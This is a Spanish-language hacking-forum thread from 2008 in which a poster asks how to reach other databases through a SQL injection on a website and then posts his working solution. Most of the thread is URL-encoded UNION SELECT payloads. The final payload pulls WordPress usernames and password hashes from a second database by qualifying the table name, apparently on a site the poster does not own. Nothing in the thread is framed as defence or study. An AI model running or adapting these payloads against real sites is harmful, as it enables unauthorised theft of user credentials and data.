Título: SOLUCIONADO ¿Como Selecionar Una BD Distinta Con "USE", en una Inyeccion SQL? Publicado por: OzX en 19 Diciembre 2008, 23:05 pm Hi¡
Bueno, al grano Tengo una web que tiene muchas base de datos (gracias a information schema schemata). Llamemosla db1 db2 db3 db4 La web trabaja con al db1, por lo cual si yo hago algun Código: union+select+all+1,2,campo_que_no_existe,3+from+tabla. me saldria Table 'db1.campo_que_no_existe' doesn't exist Ahora bien yo tengo las tablas y los campos de todas las base de datos, gracias al information schema (again XD'). Pero si yo intento hacer una consulta me dice que no existe la tabla ni el campo ni nada, pues claro estoy intentando hacer una peticion a la db2, pero esta por defecto las hace a las db1. ahora bien leyendo y preguntando, descrubri el "USE DB", que sirve para selecionar una base de datos y luego hacer la consulta. http://dev.mysql.com/doc/refman/5.0/es/use.html Por EJ Código: mysql> USE db1; MI Problema es¡¡¡ ¿Como C"·$%&/? Combino la Sentencia USE en una Inyeccion SQL? Asi no Funciona (Aunque Cambie el valor de la db a char o hexsql o dejo asi para que se entienda mejor) and+1=0+union+select+all+1,2,3+from+wp_users+use+wordpress_cri o... tampoco and+1=0++use+wordpress_cri+and+union+select+all+1,2,3+from+wp_users Espero que me puedan Ayudar :D Saludos¡ OzX¡ concat(user_login,user_pass) <= CAMPOS wordpres.cri <= db wp_users <= tabla de la db EDITADO LO LOGRE¡ +and+1=0+union+select+all+1,2,3,concat(user_login,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wordpress_cri.wp_users :d Título: Re: ¿Como Selecionar Una BD Distinta Con "USE", en una Inyeccion SQL? Publicado por: OzX en 19 Diciembre 2008, 23:22 pm LO SOLUCIONEEEEEEEEEEEEEEEEEEEE
tan estupido pordios, tenia el resultado hay¡¡¡ pues me di cuenta que el mismo information schema, es una db separada tonce me crujio la teja tonce provemos information_schema.tables si information_schema <= es la db y .tables <= es la tabla tonce cambiemos eso y¡ +and+1=0+union+select+all+1,2,3,concat(user_login,user_pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+wordpress_cri.wp_users SHAN¡ asi puedo ver la informacion de las otras DB¡ jawjwaj wn duro las cago pero me salio XD¡ gracias a las 10 visitas q vieron el post XD¡ |